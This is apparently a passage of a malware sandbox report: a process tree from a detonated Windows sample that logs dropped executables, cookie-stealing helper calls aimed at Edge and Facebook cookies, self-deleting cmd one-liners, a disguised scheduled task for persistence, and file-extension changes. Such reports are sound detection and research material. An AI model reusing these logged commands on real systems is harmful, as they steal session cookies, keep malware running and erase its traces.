                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                                                    9⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks processor information in registry
                                                                                                                    PID:5148
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                      10⤵
                                                                                                                        PID:4896
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill /im GameBox64bit.exe /f
                                                                                                                          11⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:5516
                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                          timeout /t 6
                                                                                                                          11⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:5680
                                                                                                              • C:\Users\Admin\Documents\PNNeHOMX9DbtnmTJ7q55Vd6R.exe
                                                                                                                "C:\Users\Admin\Documents\PNNeHOMX9DbtnmTJ7q55Vd6R.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks processor information in registry
                                                                                                                PID:4952
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im PNNeHOMX9DbtnmTJ7q55Vd6R.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\PNNeHOMX9DbtnmTJ7q55Vd6R.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                  7⤵
                                                                                                                    PID:5024
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      8⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4552
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /im PNNeHOMX9DbtnmTJ7q55Vd6R.exe /f
                                                                                                                      8⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5416
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout /t 6
                                                                                                                      8⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:5764
                                                                                                                • C:\Users\Admin\Documents\OmXRIJsqKgE9itNeN2qhCUvg.exe
                                                                                                                  "C:\Users\Admin\Documents\OmXRIJsqKgE9itNeN2qhCUvg.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:4840
                                                                                                                  • C:\Users\Admin\Documents\OmXRIJsqKgE9itNeN2qhCUvg.exe
                                                                                                                    C:\Users\Admin\Documents\OmXRIJsqKgE9itNeN2qhCUvg.exe
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4452
                                                                                                                • C:\Users\Admin\Documents\wcr_sLUf5EdGagPm9Ej7LK_2.exe
                                                                                                                  "C:\Users\Admin\Documents\wcr_sLUf5EdGagPm9Ej7LK_2.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4200
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 660
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4356
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 672
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5000
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 704
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:3164
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 708
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Program crash
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:2312
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 860
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5436
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 1096
                                                                                                                    7⤵
                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                    • Program crash
                                                                                                                    PID:5864
                                                                                                                • C:\Users\Admin\Documents\TldVmXwvnBtEETjHyqKxcYNU.exe
                                                                                                                  "C:\Users\Admin\Documents\TldVmXwvnBtEETjHyqKxcYNU.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:4932
                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops startup file
                                                                                                                    PID:4768
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      8⤵
                                                                                                                        PID:4552
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:2740
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5564
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4640
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5356
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4156
                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      PID:4588
                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4352
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4988
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                          PID:5516
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          8⤵
                                                                                                                            PID:6004
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            8⤵
                                                                                                                              PID:5828
                                                                                                                        • C:\Users\Admin\Documents\2wY1Dz_wdq8G2lisVQ10RtDY.exe
                                                                                                                          "C:\Users\Admin\Documents\2wY1Dz_wdq8G2lisVQ10RtDY.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4108
                                                                                                                          • C:\Users\Admin\Documents\2wY1Dz_wdq8G2lisVQ10RtDY.exe
                                                                                                                            "C:\Users\Admin\Documents\2wY1Dz_wdq8G2lisVQ10RtDY.exe" -a
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:3636
                                                                                                                        • C:\Users\Admin\Documents\RuEWuaoCNTBys62FQqmvCnOa.exe
                                                                                                                          "C:\Users\Admin\Documents\RuEWuaoCNTBys62FQqmvCnOa.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:4300
                                                                                                                        • C:\Users\Admin\Documents\rdIbPH4bh7P2_mka8G9w4QJl.exe
                                                                                                                          "C:\Users\Admin\Documents\rdIbPH4bh7P2_mka8G9w4QJl.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          PID:1096
                                                                                                                          • C:\Users\Admin\Documents\rdIbPH4bh7P2_mka8G9w4QJl.exe
                                                                                                                            "C:\Users\Admin\Documents\rdIbPH4bh7P2_mka8G9w4QJl.exe"
                                                                                                                            7⤵
                                                                                                                              PID:2312
                                                                                                                          • C:\Users\Admin\Documents\_ZHp4fBhqxKYcGhVLvc78ftv.exe
                                                                                                                            "C:\Users\Admin\Documents\_ZHp4fBhqxKYcGhVLvc78ftv.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4120
                                                                                                                            • C:\Users\Admin\Documents\_ZHp4fBhqxKYcGhVLvc78ftv.exe
                                                                                                                              "C:\Users\Admin\Documents\_ZHp4fBhqxKYcGhVLvc78ftv.exe"
                                                                                                                              7⤵
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:5312
                                                                                                                          • C:\Users\Admin\Documents\gssosWQUC8KjXoMw_fmYrWQO.exe
                                                                                                                            "C:\Users\Admin\Documents\gssosWQUC8KjXoMw_fmYrWQO.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:4324
                                                                                                                            • C:\Users\Admin\Documents\gssosWQUC8KjXoMw_fmYrWQO.exe
                                                                                                                              "{path}"
                                                                                                                              7⤵
                                                                                                                                PID:5340
                                                                                                                            • C:\Users\Admin\Documents\QMmXxtopTjxkzUxBgLFQ3fVF.exe
                                                                                                                              "C:\Users\Admin\Documents\QMmXxtopTjxkzUxBgLFQ3fVF.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2176
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:3096
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:6044
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                7⤵
                                                                                                                                  PID:2104
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  7⤵
                                                                                                                                    PID:2412
                                                                                                                                • C:\Users\Admin\Documents\wHOICD5GmmjG0U4aKcuL2T3C.exe
                                                                                                                                  "C:\Users\Admin\Documents\wHOICD5GmmjG0U4aKcuL2T3C.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4140
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 660
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:3748
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 672
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:5104
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 704
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:5160
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 740
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:5420
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 736
                                                                                                                                    7⤵
                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                    • Program crash
                                                                                                                                    PID:5684
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                              4⤵
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:412
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_6.exe
                                                                                                                                sonia_6.exe
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Adds Run key to start application
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1560
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2760
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3904
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                  6⤵
                                                                                                                                    PID:3816
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                    6⤵
                                                                                                                                      PID:5648
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                  4⤵
                                                                                                                                    PID:2152
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:684
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_4.exe
                                                                                                                                      sonia_4.exe
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3884
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:4092
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_2.exe
                                                                                                                                      sonia_2.exe
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:408
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:3400
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_1.exe
                                                                                                                                      sonia_1.exe
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:1456
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 528
                                                                                                                                    4⤵
                                                                                                                                    • Program crash
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:3444
                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Modifies registry class
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:516
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                2⤵
                                                                                                                                  PID:4420
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:4792
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_1.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS4EB13D14\sonia_1.exe" -a
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:8
                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:4284
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:4320
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:5448
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:5472
                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:5784
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                  2⤵
                                                                                                                                    PID:5988
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                  PID:5596
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\9547.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\9547.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5144
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9B72.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\9B72.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:4120
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F0B2.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F0B2.exe
                                                                                                                                    1⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:5652
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7A32.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7A32.exe
                                                                                                                                    1⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:2104
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\CF96.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\CF96.exe
                                                                                                                                    1⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:4452
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D525.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\D525.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:3168
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FC17.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\FC17.exe
                                                                                                                                      1⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:5004
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3335.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\3335.exe
                                                                                                                                      1⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:4932
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5AD3.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5AD3.exe
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:5920
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5AD3.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\5AD3.exe
                                                                                                                                        2⤵
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:4996
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\Users\Admin\AppData\Local\e4078f60-050f-4903-b8ed-6f8dd1c34f11" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                          3⤵
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:4580
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5AD3.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5AD3.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                          3⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:5380
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5AD3.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\5AD3.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                            4⤵
                                                                                                                                            • Modifies extensions of user files
                                                                                                                                            PID:3200
                                                                                                                                            • C:\Users\Admin\AppData\Local\db5b1a44-0c77-4d84-a972-1bed0e324b04\build2.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\db5b1a44-0c77-4d84-a972-1bed0e324b04\build2.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:2260
                                                                                                                                              • C:\Users\Admin\AppData\Local\db5b1a44-0c77-4d84-a972-1bed0e324b04\build2.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\db5b1a44-0c77-4d84-a972-1bed0e324b04\build2.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:2212
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\db5b1a44-0c77-4d84-a972-1bed0e324b04\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                  7⤵
                                                                                                                                                    PID:3448
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /im build2.exe /f
                                                                                                                                                      8⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:4380
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /t 6
                                                                                                                                                      8⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:4544
                                                                                                                                              • C:\Users\Admin\AppData\Local\db5b1a44-0c77-4d84-a972-1bed0e324b04\build3.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\db5b1a44-0c77-4d84-a972-1bed0e324b04\build3.exe"
                                                                                                                                                5⤵
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:1912
                                                                                                                                                • C:\Users\Admin\AppData\Local\db5b1a44-0c77-4d84-a972-1bed0e324b04\build3.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\db5b1a44-0c77-4d84-a972-1bed0e324b04\build3.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:1572
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                      7⤵
                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                      PID:3700
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5C2B.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\5C2B.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:6016
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nnvmwmp\
                                                                                                                                              2⤵
                                                                                                                                                PID:5616
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yrjfdoc.exe" C:\Windows\SysWOW64\nnvmwmp\
                                                                                                                                                2⤵
                                                                                                                                                  PID:4884
